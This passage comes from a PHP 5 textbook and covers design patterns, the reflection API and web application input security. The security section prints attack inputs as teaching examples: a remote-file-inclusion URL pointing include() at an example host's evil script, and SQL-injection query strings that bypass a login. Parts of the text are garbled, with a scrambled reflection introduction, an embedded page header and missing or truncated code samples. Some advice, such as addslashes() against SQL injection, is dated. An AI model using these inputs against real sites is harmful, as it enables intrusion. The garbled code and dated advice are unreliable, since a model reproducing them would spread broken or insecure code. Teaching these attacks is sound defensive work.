    private function __construct()
    {
    }

    private function __clone()
    {
    }

    function Log($str)
    {
        // Take care of logging
    }

    static private $instance = NULL;
}

Logger::getInstance()->Log("Checkpoint");

The essence of this pattern is Logger::getInstance(), which gives you access to the logging object from anywhere in your application, whether it is from a function, a method, or the global scope.

In this example, the constructor and clone methods are defined as private. This is done so that a developer can’t mistakenly create a second instance of the Logger class using the new or clone operators; therefore, getInstance() is the only way to access the singleton class instance.

4.4.3 Factory Pattern

Polymorphism and the use of base classes is really at the center of OOP. However, at some stage, a concrete instance of the base class’s subclasses must be created. This is usually done using the factory pattern. A Factory class has a static method that receives some input and, according to that input, it decides what class instance to create (usually a subclass).

Say that on your web site, different kinds of users can log in. Some are guests, some are regular customers, and others are administrators. In a common scenario, you would have a base class User and have three subclasses: GuestUser, CustomerUser, and AdminUser. Likely User and its subclasses would contain methods to retrieve information about the user (for example, permissions on what they can access on the web site and their personal preferences).

The best way for you to write your web application is to use the base class User as much as possible, so that the code would be generic and that it would be easy to add additional kinds of users when the need arises.

The following example shows a possible implementation for the four User classes, and the UserFactory class that is used to create the correct user object according to the username:

abstract class User {
    function __construct($name)
    {
        $this->name = $name;
    }

    function getName()
    {
        return $this->name;
    }

    // Permission methods
    function hasReadPermission()
    {
        return true;
    }

    function hasModifyPermission()
    {
        return false;
    }

    function hasDeletePermission()
    {
        return false;
    }

    // Customization methods
    function wantsFlashInterface()
    {
        return true;
    }

    protected $name = NULL;
}

class GuestUser extends User {
}

class CustomerUser extends User {
    function hasModifyPermission()
    {
        return true;
    }
}

class AdminUser extends User {
    function hasModifyPermission()
    {
        return true;
    }

    function hasDeletePermission()
    {
        return true;
    }

    function wantsFlashInterface()
    {
        return false;
    }
}

class UserFactory {
    private static $users = array("Andi"=>"admin", "Stig"=>"guest",
                                  "Derick"=>"customer");

    static function Create($name)
    {
        if (!isset(self::$users[$name])) {
            // Error out because the user doesn't exist
            throw new Exception("Unknown user: $name");
        }
        switch (self::$users[$name]) {
            case "guest": return new GuestUser($name);
            case "customer": return new CustomerUser($name);
            case "admin": return new AdminUser($name);
            default:
                // Error out because the user kind doesn't exist
                throw new Exception("Unknown user kind for: $name");
        }
    }
}

function boolToStr($b)
{
    if ($b == true) {
        return "Yes\n";
    } else {
        return "No\n";
    }
}

function displayPermissions(User $obj)
{
    print $obj->getName() . "'s permissions:\n";
    print "Read: " . boolToStr($obj->hasReadPermission());
    print "Modify: " . boolToStr($obj->hasModifyPermission());
    print "Delete: " . boolToStr($obj->hasDeletePermission());
}

function displayRequirements(User $obj)
{
    if ($obj->wantsFlashInterface()) {
        print $obj->getName() . " requires Flash\n";
    }
}

$logins = array("Andi", "Stig", "Derick");

foreach($logins as $login) {
    displayPermissions(UserFactory::Create($login));
    displayRequirements(UserFactory::Create($login));
}

Running this code outputs

Andi's permissions:
Read: Yes
Modify: Yes
Delete: Yes
Stig's permissions:
Read: Yes
Modify: No
Delete: No
Stig requires Flash
Derick's permissions:
Read: Yes
Modify: Yes
Delete: No
Derick requires Flash

This code snippet is a classic example of a factory pattern. You have a class hierarchy (in this case, the User hierarchy), which your code such as displayPermissions() treats identically. The only place where treatment of the classes differs is in the factory itself, which constructs these instances. In this example, the factory checks what kind of user the username belongs to and creates its class accordingly. In real life, instead of saving the user to user-kind mapping in a static array, you would probably save it in a database or a configuration file.

Tip: Besides Create(), you will often find other names used for the factory method, such as factory(), factoryMethod(), or createInstance().

4.4.4 Observer Pattern

PHP applications usually manipulate data. In many cases, changes to one piece of data can affect many different parts of your application’s code. For example, the price of each product item displayed on an e-commerce site in the customer’s local currency is affected by the current exchange rate. Now, assume that each product item is represented by a PHP object that most likely originates from a database; the exchange rate itself is most probably being taken from a different source and is not part of the item’s database entry. Let’s also assume that each such object has a display() method that outputs the HTML relevant to this product.

The observer pattern allows for objects to register on certain events and/or data, and when such an event or change in data occurs, they are automatically notified. In this way, you could develop the product item to be an observer on the currency exchange rate, and before printing out the list of items, you could trigger an event that updates all the registered objects with the correct rate.
Doing so gives the objects a chance to update themselves and take the new data into account in their display() method.

Usually, the observer pattern is implemented using an interface called Observer, which the class that is interested in acting as an observer must implement. For example:

interface Observer {
    function notify($obj);
}

An object that wants to be “observable” usually has a register method that allows the Observer object to register itself. For example, the following might be our exchange rate class:

class ExchangeRate {
    static private $instance = NULL;
    private $observers = array();
    private $exchange_rate;

    // Private constructor: instances are only created via getInstance()
    private function __construct()
    {
    }

    static public function getInstance()
    {
        if (self::$instance == NULL) {
            self::$instance = new ExchangeRate();
        }
        return self::$instance;
    }

    public function getExchangeRate()
    {
        return $this->exchange_rate;
    }

    public function setExchangeRate($new_rate)
    {
        $this->exchange_rate = $new_rate;
        $this->notifyObservers();
    }

    public function registerObserver($obj)
    {
        $this->observers[] = $obj;
    }

    function notifyObservers()
    {
        foreach($this->observers as $obj) {
            $obj->notify($this);
        }
    }
}

class ProductItem implements Observer {
    public function __construct()
    {
        ExchangeRate::getInstance()->registerObserver($this);
    }

    public function notify($obj)
    {
        if ($obj instanceof ExchangeRate) {
            // Update exchange rate data
            print "Received update!\n";
        }
    }
}

$product1 = new ProductItem();
$product2 = new ProductItem();

ExchangeRate::getInstance()->setExchangeRate(4.5);

131 Gutmans_ch04 Page 103 Thursday, September 23, 2004 2:39 PM 4.5 Reflection 103 This code prints Received update! Received update! class doesn’t do Although the example isn’t complete (the ProductItem setExchangeRate() method), anything useful), when the last line executes (the and $product2 are notified via their notify() methods with the both $product1 new exchange rate value, allowing them to recalculate their cost. This pattern can be used in many cases; specifically in web development, it can be used to create an infrastructure of objects representing data that , POST might be affected by cookies, GET , and other input variables. 4.5 R EFLECTION 4.5.1 Introduction reflection capabilities (also referred to as New to PHP 5 are its introspec- tion ). These features enable you to gather information about your script at runtime; specifically, you can examine your functions, classes, and more. It also enables you to access such language objects by using the available meta- data. In many cases, the fact that PHP enables you to call functions indirectly ) or instantiate classes directly (new $classname(...) ) is suffi- (using $func(...) cient. However, in this section, you see that the provided reflection API is more powerful and gives you a rich set of tools to work directly with your applica- tion. 4.5.2 Reflection API The reflection API consists of numerous classes that you can use to introspect your application.The following is a list of these items. The next section gives examples of how to use them. interface Reflector static export(...) class ReflectionFunction implements Reflector __construct(string $name) string __toString() static mixed export(string $name [,bool $return = false]) bool isInternal() bool isUserDefined() string getName() string getFileName() int getStartLine()

    int getEndLine()
    string getDocComment()
    mixed[] getStaticVariables()
    mixed invoke(mixed arg0, mixed arg1, ...)
    bool returnsReference()
    ReflectionParameter[] getParameters()

class ReflectionMethod extends ReflectionFunction implements Reflector
    bool isPublic()
    bool isPrivate()
    bool isProtected()
    bool isAbstract()
    bool isFinal()
    bool isStatic()
    bool isConstructor()
    bool isDestructor()
    int getModifiers()
    ReflectionClass getDeclaringClass()

class ReflectionClass implements Reflector
    string __toString()
    static mixed export(string $name [,bool $return = false])
    string getName()
    bool isInternal()
    bool isUserDefined()
    bool isInstantiable()
    string getFileName()
    int getStartLine()
    int getEndLine()
    string getDocComment()
    ReflectionMethod getConstructor()
    ReflectionMethod getMethod(string $name)
    ReflectionMethod[] getMethods(int $filter)
    ReflectionProperty getProperty(string $name)
    ReflectionProperty[] getProperties(int $filter)
    mixed[] getConstants()
    mixed getConstant(string $name)
    ReflectionClass[] getInterfaces()
    bool isInterface()
    bool isAbstract()
    bool isFinal()
    int getModifiers()
    bool isInstance($obj)
    object newInstance(mixed arg0, arg1, ...)
    ReflectionClass getParentClass()
    bool isSubclassOf(string $class)
    bool isSubclassOf(ReflectionClass $class)
    mixed[] getStaticProperties()
    mixed[] getDefaultProperties()
    bool isIterateable()
    bool implementsInterface(string $ifc)
    bool implementsInterface(ReflectionClass $ifc)

    ReflectionExtension getExtension()
    string getExtensionName()

class ReflectionParameter implements Reflector
    static mixed export(mixed func, int/string $param [,bool $return = false])
    __construct(mixed func, int/string $param [,bool $return = false])
    string __toString()
    string getName()
    bool isPassedByReference()
    ReflectionClass getClass()
    bool allowsNull()

class ReflectionExtension implements Reflector
    static export(string $ext [,bool $return = false])
    __construct(string $name)
    string __toString()
    string getName()
    string getVersion()
    ReflectionFunction[] getFunctions()
    mixed[] getConstants()
    mixed[] getINIEntries()
    ReflectionClass[] getClasses()
    String[] getClassNames()

class ReflectionProperty implements Reflector
    static export(string/object $class, string $name, [,bool $return = false])
    __construct(string/object $class, string $name)
    string getName()
    mixed getValue($object)
    setValue($object, mixed $value)
    bool isPublic()
    bool isPrivate()
    bool isProtected()
    bool isStatic()
    bool isDefault()
    int getModifiers()
    ReflectionClass getDeclaringClass()

class Reflection
    static mixed export(Reflector $r [, bool $return = 0])
    static array getModifierNames(int $modifier_value)

class ReflectionException extends Exception
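To make the list above a little more concrete, here is a minimal sketch that uses two of the listed classes, ReflectionClass and ReflectionMethod. The Greeter class and the public_method_names() helper are hypothetical names invented for this illustration; only the reflection calls themselves come from the API.

```php
<?php
// Hypothetical class used only for this illustration.
class Greeter
{
    public function greet($name)
    {
        return "Hello, $name";
    }

    protected function log($message)
    {
    }

    private function secret()
    {
    }
}

// Hypothetical helper: returns the sorted names of a class's public methods.
function public_method_names($className)
{
    $class = new ReflectionClass($className);
    $names = array();
    foreach ($class->getMethods(ReflectionMethod::IS_PUBLIC) as $method) {
        $names[] = $method->getName();
    }
    sort($names);
    return $names;
}

echo implode(', ', public_method_names('Greeter')), "\n";   // greet

// Call a method through its reflection object.
$method = new ReflectionMethod('Greeter', 'greet');
echo $method->invoke(new Greeter(), 'world'), "\n";         // Hello, world
```

The filter argument to getMethods() keeps the protected and private methods out of the result, which is often what a caller outside the class wants to see.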

4.5.3 Reflection Examples

As you may have noticed, the reflection API is extremely rich and allows you to retrieve a large amount of information from your scripts. There are many situations where reflection could come in handy, and realizing this potential requires you to play around with the API on your own and use your imagination. In the meantime, we demonstrate two different ways you can use the reflection API. One is to give you runtime information about a PHP class (in this case an internal class), and the second is to implement a delegation model using the reflection API.

4.5.3.1 Simple Example

The following code shows a simple example of using the ReflectionClass::export() static method to extract information about the class ReflectionProperty. It can be used to extract information about any PHP class:

    ReflectionClass::export("ReflectionProperty");

The result is

    Class [ <internal> class ReflectionProperty implements Reflector ] {

      - Constants [0] {
      }

      - Static properties [0] {
      }

      - Static methods [1] {
        Method [ <internal> static public method export ] {
        }
      }

      - Properties [0] {
      }

      - Methods [13] {
        Method [ <internal> final private method __clone ] {
        }
        Method [ <internal> public method __construct ] {
        }
        Method [ <internal> public method __toString ] {
        }
        Method [ <internal> public method getName ] {
        }

        Method [ <internal> public method getValue ] {
        }
        Method [ <internal> public method setValue ] {
        }
        Method [ <internal> public method isPublic ] {
        }
        Method [ <internal> public method isPrivate ] {
        }
        Method [ <internal> public method isProtected ] {
        }
        Method [ <internal> public method isStatic ] {
        }
        Method [ <internal> public method isDefault ] {
        }
        Method [ <internal> public method getModifiers ] {
        }
        Method [ <internal> public method getDeclaringClass ] {
        }
      }
    }

As you can see, this function lists all necessary information about the class, such as methods and their signatures, properties, and constants.

4.5.4 Implementing the Delegation Pattern Using Reflection

Times arise where a class (One) is supposed to do everything another class (Two) does and more. The preliminary temptation would be for class One to extend class Two, thereby inheriting all of its functionality. However, there are times when this is the wrong thing to do, either because there isn't a clear semantic is-a relationship between classes One and Two, or class One is already extending another class, and inheritance cannot be used. Under such circumstances, it is useful to use a delegation model (via the delegation design pattern), where method calls that class One can't handle are redirected to class Two. In some cases, you may even want to chain a larger number of objects where the first one in the list has highest priority.

The following example creates such a delegator called ClassOneDelegator that first checks if the method exists and is accessible in ClassOne; if not, it tries all other objects that are registered with it. The application can register

additional objects that should be delegated to by using the addObject($obj) method. The order of adding the objects is the order of precedence when ClassOneDelegator searches for an object that can satisfy the request:

class ClassOne {
    function callClassOne() {
        print "In Class One\n";
    }
}

class ClassTwo {
    function callClassTwo() {
        print "In Class Two\n";
    }
}

class ClassOneDelegator {
    private $targets;

    function __construct() {
        $this->targets[] = new ClassOne();
    }

    function addObject($obj) {
        $this->targets[] = $obj;
    }

    function __call($name, $args) {
        foreach ($this->targets as $obj) {
            $r = new ReflectionClass($obj);
            // getMethod() throws a ReflectionException for an unknown
            // method, so test with hasMethod() first
            if ($r->hasMethod($name)) {
                $method = $r->getMethod($name);
                if ($method->isPublic() && !$method->isAbstract()) {
                    // invokeArgs() passes the array elements as
                    // separate arguments
                    return $method->invokeArgs($obj, $args);
                }
            }
        }
    }
}

$obj = new ClassOneDelegator();
$obj->addObject(new ClassTwo());
$obj->callClassOne();
$obj->callClassTwo();

Running this code results in the following output:

In Class One
In Class Two

You can see that this example uses the previously described feature of overloading method calls using the special __call() method. After the call is intercepted, __call() uses the reflection API to search for an object that can satisfy the request. Such an object is defined as an object that has a method with the same name, which is publicly accessible and is not an abstract method.

Currently, the code does nothing if no satisfying function is found. You may want to call ClassOne by default, so that you make PHP error out with a nice error message, and in case ClassOne has itself defined a __call() method, it would be called. It is up to you to implement the default case in a way that suits your needs.

4.6 SUMMARY

This chapter covered the more advanced object-oriented features of PHP, many of which are critical when implementing large-scale OO applications. Thanks to the advances of PHP 5, using common OO methodologies, such as design patterns, has now become more of a reality than with past PHP versions. For further reading, we recommend additional material on design patterns and OO methodology. A good starting point is www.cetus-links.org, which keeps an up-to-date list of good starting points. Also, we highly recommend reading the classic book Design Patterns: Elements of Reusable Object-Oriented Software by Erich Gamma, Richard Helm, Ralph Johnson, and John M. Vlissides.


CHAPTER 5

How to Write a Web Application with PHP

"The ultimate security is your understanding of reality."
H. Stanley Judd

5.1 INTRODUCTION

The most common use for PHP is building web sites. PHP makes web applications dynamic, enabling users to interact with the site. The web application collects information from the user by means of HTML forms and processes it. Some of the information collected from users and stored at the web site is sensitive information, making security a major issue. PHP provides features that enable you to collect information from the user and to secure the information. It's up to you to develop a complete application using the pieces provided by PHP. This chapter describes how to use the functionality of PHP to build a dynamic web application.

After you finish reading this chapter, you will have learned

☞ How to embed PHP into HTML files
☞ How to collect information from web page visitors using HTML forms
☞ Some techniques used to attack web sites and how to protect against them
☞ How to handle errors in user input
☞ Two methods for making data persistent throughout your application: cookies and sessions
☞ How to collect data files from users via HTML forms
☞ How to organize your web application

5.2 EMBEDDING INTO HTML

PHP doesn't have to be embedded in an HTML file, of course; you can create a PHP file that includes no HTML. However, when building a web application, you often use PHP and HTML together in a file. PHP was developed primarily for web use, to be embedded in HTML files as a templating language. When PHP code is included in a file, the file is given the PHP extension (the extension that signals your web server to expect PHP code in the file); usually .php, but a different extension, such as .phtml or .php5, can be specified when you configure your web server. The following code shows PHP embedded in HTML:

<html>
<head><title>Example 1</title></head>
<body>
<?php
    /* If it is April 1st, we show a quote */
    if (date('md') == '0401') {
        echo 'A bookstore is one of the only pieces of evidence we have '.
             'that people are still thinking. Jerry Seinfeld';
    } else {
        echo 'Good morning!';
    }
?>
</body>
</html>

The PHP section ends at the ?> line. When the text is so simple, the echo statements are acceptable. However, when you need to echo text strings that contain single or double quotes, the code becomes more complicated. If the text to be echoed in the example was a link (an anchor tag with a single-quoted href attribute), the example would not have worked correctly because the single quotes in the text would conflict with the single quotes enclosing the text string. For such a case, the PHP section can be ended before the text needs to be output and begin again before the PHP code that ends the if block and starts the else block is needed, as in the following example:

Example 2
Jerry Seinfeld ';

    } else {
        echo 'Good morning!';
    }
?>

This coding behavior is messy. You are violating one of the principles of programming: "Separate logic from content." The following version of embedding stores the text in a variable and then echoes the variable:

<?php
    /* If it is April 1st, we show a quote */
    if (date('md') == '0401') {
        $greeting = 'A bookstore is one of the only pieces of '.
                    'evidence we have that people are still thinking. '.
                    'Jerry Seinfeld';
    } else {
        $greeting = 'Good morning!';
    }
?>

Example 3

Example 4
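As a minimal sketch of the "separate logic from content" idea, the decision can live in one function and the markup in another. The names greeting_for() and render_page() are hypothetical and chosen for this illustration only; the template is wrapped in a function with output buffering so that the page can be produced as a string, and htmlspecialchars() is applied because the greeting is inserted as plain text.

```php
<?php
// Logic: decide which text to show for a month-day string such as '0401'.
function greeting_for($monthDay)
{
    if ($monthDay == '0401') {
        return 'A bookstore is one of the only pieces of evidence we have '
             . 'that people are still thinking. Jerry Seinfeld';
    }
    return 'Good morning!';
}

// Content: the HTML template, with a single embedded echo.
function render_page($greeting)
{
    ob_start();
    ?>
<html>
<head><title>Greeting</title></head>
<body>
<p><?php echo htmlspecialchars($greeting); ?></p>
</body>
</html>
<?php
    return ob_get_clean();
}

echo render_page(greeting_for(date('md')));
```

Note that the comparison is written as date('md') == '0401'; placing the comparison inside the call, as in date('md' == '0401'), would pass a boolean to date() instead of a format string.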

If you want to be sure your application can run on as many systems as possible, you should not rely on short tags because they might be turned off. The rest of the examples in this chapter use the non-short tags everywhere. We also cover some additional techniques for separating code and layout.

5.3 USER INPUT

Now that you know how to embed PHP code, you probably want to program some kind of user-specified action. For instance, the book webshop needs a login and registration system that requires user action, so we will implement this system as an example. This system requires an HTML form and a place to store the data collected by the form. Because this chapter does not deal with storing data in a database, only an API function is provided when data needs to be stored. After reading some of the later chapters, you will be able to fill these in yourself.

We require four things from the user when he or she registers for the shop: email address, first name, last name, and requested password. The HTML code for a form to collect this information looks like this:

Register

Registration

E-mail address:
First name:
Last name:
Password:

The lines that handle the form data are highlighted in bold. The form tag is the first bold line:

<form method='post' action='register.php'>

We specify post for the first attribute in the form tag, the method attribute. The HTTP GET method encodes the form data in the URL, making it visible in the browser address window and making it possible to bookmark the result of the form. Another possible method is the POST method. Because we use some sensitive data (requested password), we are better off using the POST method. The POST method encodes the form data in the body of the HTTP request so that the data is not shown in the URL and cannot be bookmarked.

The script that processes the form data can use the built-in $_GET array to process data from a form that uses the GET method and the built-in $_POST array for data from a form that uses the POST method. If you want to use both $_GET and $_POST for some postings, you can use $_REQUEST, which contains all $_GET, $_POST, and $_COOKIE elements merged into one array. If the same element exists in more than one array, the variables_order setting in the php.ini file determines which element has precedence. In this configuration setting, G represents $_GET, P represents $_POST, C represents $_COOKIE, E represents $_ENV, and S represents $_SERVER. Variables are added to $_REQUEST in the order specified by the variables_order setting. Variables added later override variables with the same name that were added earlier. The default setting is EGPCS, which means that POST variables override GET variables with the same name.

The elements of the form are defined by the input tags. The form highlights (via the bold lines) three different types of input tags. The first type (type='text') is a simple text field, with the name email. The name is needed to use the posted data in your PHP script that processes the form data. The name attribute is the key in the $_POST or $_GET array (for example, $_POST['email']).

The second type of input tag (type='password') is the same type as the text type, except that, for security reasons, all data the user types is displayed on-screen as asterisks (*). This does not mean, of course, that the form collects the asterisks and sends them with the form. It just means that the text is displayed as asterisks so no one can see the user's password. The third type (type='submit') is rendered as a submit button that a user presses to actually submit the data entered into the form. The name of the submit button is the array key for the element where the value is stored (for example, $_POST['register'] equals 'Register') when the browser posts the form back to the web server. The full form as shown in a web browser looks similar to Figure 5.1.
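The precedence rule for $_REQUEST can be simulated in a few lines. This is only a sketch of the rule as described here, not of how PHP assembles the array internally: build_request() is a hypothetical helper, the sample arrays stand in for the real superglobals, and array_replace() assumes PHP 5.3 or later.

```php
<?php
// Hypothetical helper: merge the given sources in the order named by
// $order (for example 'EGPCS'). $sources maps a letter to an array.
function build_request($order, array $sources)
{
    $request = array();
    foreach (str_split($order) as $letter) {
        if (isset($sources[$letter])) {
            // Keys added later replace keys of the same name added earlier.
            $request = array_replace($request, $sources[$letter]);
        }
    }
    return $request;
}

// Stand-ins for $_GET and $_POST carrying the same field name.
$sources = array(
    'G' => array('email' => 'from-get@example.com'),
    'P' => array('email' => 'from-post@example.com'),
);

$request = build_request('EGPCS', $sources);
echo $request['email'], "\n";   // from-post@example.com
```

With the order 'PG' instead, the GET value would win, which is why scripts that care where a value came from tend to read $_GET or $_POST directly rather than $_REQUEST.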

Fig. 5.1 Full form as shown in a web browser.

The action attribute of the form tag specifies the file to which the filled-in form is posted, in our case register.php. PHP makes available the data from all the various form elements in the designated script. To process data, we need to change our form a little more. We only want the registration form to be shown if it is being displayed for the first time, not if it has already been filled in and submitted by a user. That is, we want to display the form only if the processing script didn't receive any submitted data. We can tell whether the form has been submitted by a user by testing whether the submit button has been pressed. To do so, between the <body> and <h1> tags we add the following:

<?php if (!isset($_POST['register']) || ($_POST['register'] != 'Register')) { ?>
<h1>Registration</h1>

This line checks whether the 'register' key exists in the $_POST array. Because the $_POST array contains all fields from the posted form, the $_POST array will contain an element with the key register if the submit button has been pressed. If we use the GET method, we would use the same test on the $_GET array. Both arrays are superglobals, available in every function, without needing to be declared 'global' with the global keyword. After checking if the 'register' key exists in the array, we check if the value of the array element equals 'Register', just to be sure.


Between the </form> and </body> tags we add the following:

E-mail:
Name:
Password:

This piece of code is executed if the form was filled out. As you can see, we simply echo all the form values by echoing the elements from the $_POST array. Dealing with user input data is not much harder than this, but...

5.4 SAFE-HANDLING USER INPUT

Trust nobody, especially not the users of your web application. Users always do unexpected things, whether on purpose or by accident, and thus might find bugs or security holes in your site. In the following sections, we first show some of the major problems that may cause your site to sustain attacks. Then, we talk about some techniques to deal with the problems.

5.4.1 Common Mistakes

A certain set of mistakes are often made. If you read security-related mailing lists (such as Bugtraq, http://www.securityfocus.com/archive/1), you will notice at least a few vulnerabilities in PHP applications every week.

5.4.1.1 Global Variables

One basic mistake is not initializing global variables properly. Setting the php.ini directive 'register_globals' to Off (the default since PHP 4.2) protects against this mistake, but you still need to watch for the problem. Your application might be used by other users who have register_globals set to On. Let's illustrate what can happen if you don't initialize your variables with a basic example:

    } else {
        do_admin_task();
    }
?>

Although this looks like a simple thing, it can be overlooked in more complex scripts. In our example, not much harm is possible. The only thing that an attacker could do is use your web application with administrator rights. Far more severe problems can arise when you dynamically include files with the include() or require() functions in PHP. Consider the following (simplified) example:

This script makes it possible for an attacker to execute arbitrary PHP code on your server, by simply appending ?module=http://example.com/evilscript to the URL in the browser. When PHP receives this URL, it sets $module equal to http://example.com/evilscript. When PHP executes the include() function, it tries to include evilscript.php from example.com (which should not parse it, of course) and execute the PHP code in evilscript.php. evilscript.php might contain code that would remove all files accessible by the web server.

The first of these exploits can be solved by using $_SESSION['admin'] or setting the register_globals php.ini setting to Off. The second can be solved by checking whether the file exists on the local machine before including it, as in the following code:

5.4.1.2 Cross-Site Scripting

By using the cross-site scripting technique, an attacker might be able to execute pieces of client-side scripting languages, such as JavaScript, and steal cookies or other sensitive data. Cross-site scripting is really not hard. The attacker only needs a way to insert raw data into the HTML of the site. For example, the attacker might enter a <script> element into an input box that does not strip any HTML tags. The following script illustrates this possibility:

XSS example


'>
It’s a straightforward script. Suppose the attacker types the following into your form field: '>

Voilà! Anyone can log in as any user, using a query string like http://example.com/login.php?user=admin'%20OR%20(user='&pwd=')%20OR%20user=', which effectively executes the following query:

    SELECT login_id FROM users WHERE user='admin' OR (user='' AND pwd='') OR user=''

It's even simpler with the URL http://example.com/login.php?user=admin'%23, which executes the query SELECT login_id FROM users WHERE user='admin'#' AND pwd=''. Note that the # marks the beginning of a comment in SQL.

Again, it's a simple attack. Fortunately, it's also easy to prevent. You can sanitize the input using the addslashes() function that adds a backslash before every single quote ('), double quote ("), backslash (\), and NUL (\0). Other functions are available to sanitize input, such as strip_tags().

5.5 TECHNIQUES TO MAKE SCRIPTS "SAFE"

There is only one solution to keeping your scripts running safe: Do not trust users. Although this may sound harsh, it's perfectly true. Not only might users "hack" your site, but they also do weird things by accident. It's the programmer's responsibility to make sure that these inevitable errors can't do serious damage. Thus, you need to deploy some techniques to save the user from insanity.

5.5.1 Input Validation

One essential technique to protect your web site from users is input validation, which is an impressive term that doesn't mean much at all. The term simply means that you need to check all input that comes from the user, whether the data comes from cookies, GET, or POST data.

First, turn off register_globals in php.ini and set error_reporting to the highest possible value (E_ALL | E_STRICT). Turning off register_globals stops the registration of request data (Cookie, Session, GET, and POST variables) as global variables in your script; the high error_reporting setting will enable notices for uninitialized variables.

For different kinds of input, you can use different methods.
For instance, if you expect a parameter passed with the HTTP GET method to be an integer, force it to be an integer in your script:
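A minimal sketch of such a cast follows. The int_param() helper and the $query array (a stand-in for $_GET) are hypothetical names used only for this illustration; the helper also returns a default when the key is missing, so no notice is raised for an absent parameter.

```php
<?php
// Hypothetical helper: return the named parameter as an integer,
// or $default when the parameter is not present at all.
function int_param(array $input, $name, $default = 0)
{
    if (!isset($input[$name])) {
        return $default;
    }
    return (int) $input[$name];
}

$query = array('prod_id' => '42', 'page' => 'abc');   // stands in for $_GET

var_dump(int_param($query, 'prod_id'));   // int(42)
var_dump(int_param($query, 'page'));      // int(0)
var_dump(int_param($query, 'missing'));   // int(0)
```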

Everything other than an integer value is converted to 0. But what if $_GET['prod_id'] doesn't exist? You will receive a notice because we turned the error_reporting setting up. A better way to validate the input would be to check with isset() that the parameter exists before casting it.

However, if you have a large number of input variables, it can be tedious to write this code for each and every variable separately. Instead, you might want to create and use a function for this, as shown in the following example:

<?php
function sanitize_vars(&$vars, $signatures, $redir_url = null)
{
    $tmp = array();

    foreach ($signatures as $name => $sig) {
        if (!isset($vars[$name]) &&
            isset($sig['required']) && $sig['required'])
        {
            /* redirect if the variable doesn't exist in the array */
            if ($redir_url) {
                header("Location: $redir_url");
            } else {
                echo "Parameter $name not present and no redirect URL";
            }
            exit();
        }

        /* apply type to variable */
        $tmp[$name] = $vars[$name];
        if (isset($sig['type'])) {
            settype($tmp[$name], $sig['type']);
        }

        /* apply functions to the variables, you can use the standard PHP
         * functions, but also use your own for added flexibility. */
        if (isset($sig['function'])) {
            $tmp[$name] = call_user_func($sig['function'], $tmp[$name]);
        }
    }
    $vars = $tmp;
}

$sigs = array(
    'prod_id' => array('required' => true, 'type' => 'int'),
    'desc'    => array('required' => true, 'type' => 'string',
                       'function' => 'addslashes')
);

sanitize_vars(&$_GET, $sigs,
    "http://{$_SERVER['SERVER_NAME']}/error.php?cause=vars");
?>

5.5.2 HMAC Verification

If you need to prevent bad guys from tampering with variables passed in the URL (such as for a redirect as shown previously, or for links that pass special parameters to the linked script), you can use a hash, as shown in the following script:

<?php
function create_parameters($array)
{
    $data = '';
    $ret = array();

    foreach ($array as $key => $value) {
        $data .= $key . $value;
        $ret[] = "$key=$value";
    }

    /* We also add the md5sum of the $data as element
     * to the $ret array. */
    $hash = md5($data);
    $ret[] = "hash=$hash";

    return join('&', $ret);
}

echo 'err!';
?>

Running this script echoes a link labeled err! whose query string carries the key/value pairs followed by a hash parameter that holds the MD5 digest of the concatenated keys and values.

However, this URL is still vulnerable. An attacker can modify both the variables and the hash. We must do something better. We're not the first ones with this problem, so there is an existing solution: HMAC (Keyed-Hashing for Message Authentication). The HMAC method is proven to be stronger cryptographically, and should be used instead of home-cooked validation algorithms. The HMAC algorithm uses a secret key in a two-step hashing of plain text (in our case, the string containing the key/value pairs) with the following steps:

1. If the key length is smaller than 64 bytes (the block size that most hashing algorithms use), we pad the key to 64 bytes with \0s; if the key length is larger than 64, we first use the hash function on the key and then pad it to 64 bytes with \0s.
2. We construct opad (the 64-byte key XORed with 0x5C) and ipad (the 64-byte key XORed with 0x36).
3. We create the "inner" hash by running the hash function with the parameter ipad . plain text. (Because we use an "iterative" hash function, like md5() or sha1(), we don't need to seed the hash function with our key and then run the seeded hash function over our plain text. Internally, the hash will do the same anyway, which is the reason we padded the key up to 64 bytes.)
4. We create the "outer" hash by running the hash function over opad . inner_result, that is, using the result obtained in step 3.

Here is the formula to calculate HMAC, which should help you understand the calculation:

    H(K XOR opad, H(K XOR ipad, text))

With

☞ H. The hash function to use
☞ K. The key padded to 64 bytes with zeroes (0x0)
☞ opad. The 64 bytes of 0x5Cs

☞ ipad. The 64 bytes of 0x36s
☞ text. The plain text for which we are calculating the hash

Great, so much for the boring theory. Now let's see how we can use it with a PEAR class that was developed to calculate the hashes.

5.5.3 PEAR::Crypt_HMAC

The Crypt_HMAC class implements the algorithm as described in RFC 2104 and can be installed with pear install crypt_hmac. Let's look at it:

class Crypt_HMAC {
    /**
     * Constructor
     * Pass the key as first parameter and the method as second
     *
     * @param string key - Secret key used for the calculation
     * @param string method - Hash function used for the calculation
     * @return void
     * @access public
     */
    function Crypt_HMAC($key, $method = 'md5')
    {
        if (!in_array($method, array('sha1', 'md5'))) {
            die("Unsupported hash function '$method'.");
        }
        $this->_func = $method;

        /* Pad the key as the RFC wishes (step 1). 'H*' converts the
         * whole hex digest, whether it is 32 (md5) or 40 (sha1)
         * characters long. */
        if (strlen($key) > 64) {
            $key = pack('H*', $method($key));
        }
        if (strlen($key) < 64) {
            $key = str_pad($key, 64, chr(0));
        }

        /* Calculate the padded keys and save them (step 2) */
        $this->_ipad = substr($key, 0, 64) ^ str_repeat(chr(0x36), 64);
        $this->_opad = substr($key, 0, 64) ^ str_repeat(chr(0x5C), 64);
    }

First, we make sure that the requested underlying hash function is actually supported (for now, only the built-in PHP functions md5() and sha1() are supported). Then, we create a key, according to steps 1 and 2, as previously

described. Finally, in the constructor, we pre-pad and XOR the key so that the hash() method can be used several times without losing performance by padding the key every time a hash is requested:

    /**
     * Hashing function
     *
     * @param string data - string that will be hashed (steps 3 and 4)
     * @return string
     * @access public
     */
    function hash($data)
    {
        $func = $this->_func;
        /* 'H*' converts the whole hex digest to binary */
        $inner = pack('H*', $func($this->_ipad . $data));
        $digest = $func($this->_opad . $inner);
        return $digest;
    }
}
?>

In the hash function, we use the pre-padded key. First, we hash the inner result. Then, we hash the outer result, which is the digest (a different name for hash) that we return.

Back to our original problem. We want to verify that no one tampered with our precious $_GET variables. Here is the second, more secure, version of our create_parameters() function. SECRET_KEY is a constant that holds the secret key and is defined before the function:

function create_parameters($array)
{
    $data = '';
    $ret = array();

    foreach ($array as $key => $value) {
        $data .= $key . $value;
        $ret[] = "$key=$value";
    }
    $h = new Crypt_HMAC(SECRET_KEY, 'md5');

    $hash = $h->hash($data);
    $ret[] = "hash=$hash";

    return join('&', $ret);
}

echo 'err!';
?>

